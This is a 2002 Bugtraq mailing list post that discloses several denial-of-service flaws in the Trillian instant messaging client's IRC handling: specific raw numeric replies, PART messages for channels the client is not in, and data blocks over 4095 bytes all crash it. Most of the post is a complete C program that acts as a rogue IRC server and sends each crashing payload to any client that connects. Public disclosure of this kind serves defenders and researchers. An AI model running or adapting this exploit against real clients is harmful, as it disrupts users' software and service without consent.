Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

*sigh* Trillian multiple DoS's flaws.

From: "Lance Fitz-Herbert" <fitzies () hotmail com>
Date: Sun, 22 Sep 2002 14:11:07 +0000
I'm beginning to wonder if the makers of the instant messaging client Trillian, have done any bounds checking in their code. Personally I like trillian, its a nice peice of software, on the outside. 
Here's three more DoS attacks on trillian, exploitable via a server.
I've included some code which exploits all three.

These were tested on version .74, probably older versions are affected tho.

Multiple Raw flaws:
-------------------
There seems to be a flaw in the way trillian proccesses some IRC Raw Messages, the following raw's crash Trillian: 

206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367

The server sends the raws in the format: ':Server <Num>'
<Num> being the one of the raw codes listed above.


Part flaw:
----------
If trillian receives a message about a user parting a channel it itself is not in, or if no channel is specified at all, trillian will crash. 

Part Messages are sent in the form: ":nick!ident@address PART <Channel>"


Data buffering flaw:
--------------------
There appears to be a flaw in the way trillian buffers data from the IRC server. If trillian receives a block of data over 4095 bytes, trillian will crash. 


Exploit code to reproduce flaws:
--------------------------------

/* Trillian-Dos.c
  Author: Lance Fitz-Herbert
  Contact: IRC: Phrizer, DALnet - #KORP
           ICQ: 23549284

  Exploits Multiple Trillian DoS Flaws:
Raws 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367 
     Part Flaw
     Data length flaw.

  Tested On Version .74
  Compiles with Borland 5.5 Commandline Tools.

  These Examples Will Just DoS The Trillian Client,
*/

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <winsock.h>

SOCKET s;

#define SERVER ":server "
#define PART ":nick!ident@address PART\n"

int main(int argc, char *argv[]) {
        SOCKET TempSock = SOCKET_ERROR;
        WSADATA WsaDat;
        SOCKADDR_IN Sockaddr;
        int nRet;
        char payload[4096];
        if (argc < 2) {
                usage();
                return 1;
        }
if ((!strcmp(argv[1],"raw")) && (argc < 3) || (strcmp(argv[1],"raw")) && (strcmp(argv[1],"part")) && (strcmp(argv[1],"data"))) { 
                usage();
                return 1;
        }

        printf("Listening on port 6667 for connections....\n");
        if (WSAStartup(MAKEWORD(1, 1), &WsaDat) != 0) {
        printf("ERROR: WSA Initialization failed.");
                return 0;
        }


        /* Create Socket */
        s = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (s == INVALID_SOCKET) {
                printf("ERROR: Could Not Create Socket. Exiting\n");
                WSACleanup();
                return 0;
        }

        Sockaddr.sin_port = htons(6667);
        Sockaddr.sin_family = AF_INET;
        Sockaddr.sin_addr.s_addr  = INADDR_ANY;


       nRet = bind(s, (LPSOCKADDR)&Sockaddr, sizeof(struct sockaddr));
        if (nRet == SOCKET_ERROR) {
                printf("ERROR Binding Socket");
                WSACleanup();
                return 0;
        }

        /* Make Socket Listen */
        if (listen(s, 10) == SOCKET_ERROR) {
                printf("ERROR: Couldnt Make Listening Socket\n");
                WSACleanup();
                return 0;
        }

        while (TempSock == SOCKET_ERROR) {
              TempSock = accept(s, NULL, NULL);
        }

        printf("Client Connected, Sending Payload\n");


        if (!strcmp(argv[1],"part")) {
                send(TempSock,PART,strlen(PART),0);
        }
        if (!strcmp(argv[1],"raw")) {
                send(TempSock,SERVER,strlen(SERVER),0);
                send(TempSock,argv[2],strlen(argv[2]),0);
                send(TempSock,"\n",1,0);
        }
        if (!strcmp(argv[1],"data")) {
                memset(payload,'A',4096);
                send(TempSock,payload,strlen(payload),0);
        }
        printf("Exiting\n");
        sleep(100);
        WSACleanup();
        return 0;
}

usage() {
                printf("\nTrillian Multiple DoS Flaws\n");
                printf("---------------------------\n");
                printf("Coded By Lance Fitz-Herbert (Phrizer, DALnet/#KORP)\n");
                printf("Tested On Version .74\n\n");
                printf("Usage: Trillian-Dos <type> [num]\n");
                printf("Type: raw, part, data\n");
printf("Num : 206, 211, 213, 214, 215, 217, 218, 243, 302, 317, 324, 332, 333, 352, 367\n\n"); 
}

--end code--


----
NOTE: Because of the amount of spam i receive, i require all emails directed *to me* to contain the word "nospam" in the subject line somewhere. Else i might not get your email. thankyou. 
----

_________________________________________________________________
MSN Photos is the easiest way to share and print your photos: http://photos.msn.com/support/worldwide.aspx
Previous By Date Next
Previous By Thread Next

Current thread: